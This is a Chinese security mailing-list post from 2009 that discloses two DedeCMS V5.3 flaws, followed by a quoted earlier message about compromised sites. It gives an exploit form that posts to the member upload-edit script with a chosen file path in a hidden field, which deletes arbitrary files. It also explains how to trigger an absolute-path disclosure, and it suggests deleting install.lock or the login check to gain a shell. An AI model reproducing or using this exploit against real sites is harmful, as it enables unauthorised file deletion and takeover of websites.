1.删除网站任意文件. 2.爆绝对路径 影响系统 = DedeCMS V5.3 1.删除任意文件. 注册正常用户...随意找个地方上传个附件就OK. 部分代码: 复制代码 <form class="mTB10 mL10 mR10" name="form1" action="http://网站地址/member/uploads_edit.php"; method="post" enctype="multipart/form-data"> <input type="hidden" name="aid" value="28" /> <input type="hidden" name="mediatype" value="1" /> <input type="hidden" name="oldurl" value="要删除的文件" /> <!--如value="/index.php"> <input type="hidden" name="dopost" value="save" /> <table cellspacing="1" class="submit"> 修改完毕后.打开HTML页.直接点提交. 然后在用户管理附件里点击删除. 2.爆路径. 也是利用原来的html代码.. 复制代码 <td align="right" valign="top">更换附件:</td> <td><input name="addonfile" type="file" id="addonfile" style="width:300px" /></td> 把type="file"删除.保存.然后打开.直接点提交. 就可以爆路径了.. 具体的如何利用这个漏洞拿到SHELL.就看你自己的想象力了..比如删除install.lock....比如删除用户登陆检测..
------------------ 原始邮件 ------------------ 发件人: "wildenwolf wildenwolf"<[email protected]>; 发送时间: 2009年8月16日(星期天) 上午8:57 收件人: "ph4nt0m"<[email protected]>; 主题: [Ph4nt0m] Re: 5.3.1dede漏洞 期待ing~~~ 在 09-8-14,噢喔猪 写道: > 我的网站,几个朋友的,,都给挂马,, > 都是dede5.3.1的。。。 > > 是不是有漏洞了。 > > > --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
